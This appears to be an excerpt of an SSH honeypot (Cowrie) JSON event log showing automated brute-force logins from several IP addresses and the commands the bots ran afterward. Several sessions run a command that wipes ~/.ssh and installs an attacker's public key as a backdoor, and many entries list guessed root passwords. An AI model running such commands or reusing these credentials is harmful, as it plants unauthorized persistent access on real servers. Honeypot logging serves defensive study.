sh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:43:46.635814Z","src_ip":"45.159.112.103","session":"0ec4b1ac2af8"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:43:47.129816Z","src_ip":"45.159.112.103","session":"0ec4b1ac2af8"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:43:47.239115Z","src_ip":"45.159.112.103","session":"5700e2d691ce"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:43:47.243728Z","src_ip":"45.159.112.103","session":"0ec4b1ac2af8"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":38476,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f7690005191","protocol":"ssh","message":"New connection: 36.89.28.139:38476 (1.2.3.4:22) [session: 7f7690005191]","sensor":"my-vps","timestamp":"2025-08-26T00:43:53.987739Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:43:53.988600Z","src_ip":"36.89.28.139","session":"7f7690005191"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:43:54.163558Z","src_ip":"36.89.28.139","session":"7f7690005191"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd12","message":"login attempt [root/P@ssw0rd12] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:43:54.906023Z","src_ip":"36.89.28.139","session":"7f7690005191"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:43:55.311524Z","src_ip":"36.89.28.139","session":"7f7690005191"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:43:55.312248Z","src_ip":"36.89.28.139","session":"7f7690005191"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:43:55.313046Z","src_ip":"36.89.28.139","session":"7f7690005191"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:43:55.488877Z","src_ip":"36.89.28.139","session":"7f7690005191"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:43:55.857701Z","src_ip":"36.89.28.139","session":"7f7690005191"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:43:55.858423Z","src_ip":"36.89.28.139","session":"7f7690005191"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:43:56.035096Z","src_ip":"36.89.28.139","session":"7f7690005191"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:43:56.036442Z","src_ip":"36.89.28.139","session":"7f7690005191"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":48108,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0b46cb22042","protocol":"ssh","message":"New connection: 36.89.28.139:48108 (1.2.3.4:22) [session: a0b46cb22042]","sensor":"my-vps","timestamp":"2025-08-26T00:43:56.213673Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:43:56.214571Z","src_ip":"36.89.28.139","session":"a0b46cb22042"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:43:56.393399Z","src_ip":"36.89.28.139","session":"a0b46cb22042"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:43:57.164932Z","src_ip":"36.89.28.139","session":"a0b46cb22042"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:43:58.347171Z","src_ip":"36.89.28.139","session":"a0b46cb22042"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":48118,"dst_ip":"1.2.3.4","dst_port":22,"session":"46a737e8fbee","protocol":"ssh","message":"New connection: 36.89.28.139:48118 (1.2.3.4:22) [session: 46a737e8fbee]","sensor":"my-vps","timestamp":"2025-08-26T00:43:58.531337Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:43:58.532238Z","src_ip":"36.89.28.139","session":"46a737e8fbee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:43:58.718276Z","src_ip":"36.89.28.139","session":"46a737e8fbee"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:43:59.503300Z","src_ip":"36.89.28.139","session":"46a737e8fbee"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:43:59.690775Z","src_ip":"36.89.28.139","session":"7f7690005191"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:43:59.691800Z","src_ip":"36.89.28.139","session":"46a737e8fbee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60798,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4553d7bf22b","protocol":"ssh","message":"New connection: 212.227.235.229:60798 (1.2.3.4:22) [session: c4553d7bf22b]","sensor":"my-vps","timestamp":"2025-08-26T00:44:20.814267Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:44:20.819671Z","src_ip":"212.227.235.229","session":"c4553d7bf22b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:44:21.056939Z","src_ip":"212.227.235.229","session":"c4553d7bf22b"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"123456","message":"login attempt [gpadmin/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T00:44:21.999747Z","src_ip":"212.227.235.229","session":"c4553d7bf22b"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:44:23.241890Z","src_ip":"212.227.235.229","session":"c4553d7bf22b"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":48818,"dst_ip":"1.2.3.4","dst_port":22,"session":"00d097fcdd2c","protocol":"ssh","message":"New connection: 24.108.102.132:48818 (1.2.3.4:22) [session: 00d097fcdd2c]","sensor":"my-vps","timestamp":"2025-08-26T00:44:48.418249Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:44:48.428890Z","src_ip":"24.108.102.132","session":"00d097fcdd2c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:44:48.591314Z","src_ip":"24.108.102.132","session":"00d097fcdd2c"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin.123456","message":"login attempt [root/Admin.123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:44:49.262583Z","src_ip":"24.108.102.132","session":"00d097fcdd2c"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":53118,"dst_ip":"1.2.3.4","dst_port":22,"session":"89fd3f15d1e6","protocol":"ssh","message":"New connection: 45.159.112.103:53118 (1.2.3.4:22) [session: 89fd3f15d1e6]","sensor":"my-vps","timestamp":"2025-08-26T00:44:49.389987Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:44:49.390957Z","src_ip":"45.159.112.103","session":"89fd3f15d1e6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:44:49.500569Z","src_ip":"45.159.112.103","session":"89fd3f15d1e6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:44:49.635921Z","src_ip":"24.108.102.132","session":"00d097fcdd2c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:44:49.636675Z","src_ip":"24.108.102.132","session":"00d097fcdd2c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:44:49.637907Z","src_ip":"24.108.102.132","session":"00d097fcdd2c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:44:49.804987Z","src_ip":"24.108.102.132","session":"00d097fcdd2c"}
{"eventid":"cowrie.login.failed","username":"alex","password":"alex2025","message":"login attempt [alex/alex2025] failed","sensor":"my-vps","timestamp":"2025-08-26T00:44:49.980823Z","src_ip":"45.159.112.103","session":"89fd3f15d1e6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:44:50.217237Z","src_ip":"24.108.102.132","session":"00d097fcdd2c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:44:50.218200Z","src_ip":"24.108.102.132","session":"00d097fcdd2c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:44:50.385108Z","src_ip":"24.108.102.132","session":"00d097fcdd2c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:44:50.386216Z","src_ip":"24.108.102.132","session":"00d097fcdd2c"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":48824,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a1036daf4ea","protocol":"ssh","message":"New connection: 24.108.102.132:48824 (1.2.3.4:22) [session: 8a1036daf4ea]","sensor":"my-vps","timestamp":"2025-08-26T00:44:50.538230Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:44:50.543427Z","src_ip":"24.108.102.132","session":"8a1036daf4ea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:44:50.711694Z","src_ip":"24.108.102.132","session":"8a1036daf4ea"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:44:51.092551Z","src_ip":"45.159.112.103","session":"89fd3f15d1e6"}
